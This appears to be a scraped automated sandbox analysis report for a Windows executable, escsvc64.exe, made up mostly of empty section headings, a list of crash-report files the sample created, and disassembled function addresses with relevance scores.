Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_escsvc64.exe_53d1627f168be861b92b51d2acfa94936fb4840_2aa0144e_6a1a781b-ddbc-435f-b849-a383447a581f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA819.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8E5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA915.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
escsvc64.exe

Function 00000001400032A0 Relevance: 12.2, APIs: 8, Instructions: 163
memoryCOMMON

Function 0000000140007450 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133
memoryCOMMON

Function 0000000180001C10 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Function 0000000140006450 Relevance: 10.6, APIs: 7, Instructions: 65
memorythreadCOMMON

Function 0000000140007170 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 0000000140008800 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 0000000140007610 Relevance: 2.6, APIs: 2, Instructions: 69
memoryCOMMON

Function 000000018000BBC0 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Function 00000001400076B0 Relevance: 1.3, APIs: 1, Instructions: 26
COMMON

Function 0000000140001C90 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 233
registrystringCOMMON

Function 0000000140008E50 Relevance: 29.0, APIs: 19, Instructions: 515
COMMON

Function 0000000140002090 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 144
stringCOMMON

Function 000000014000CF60 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152
libraryloaderCOMMON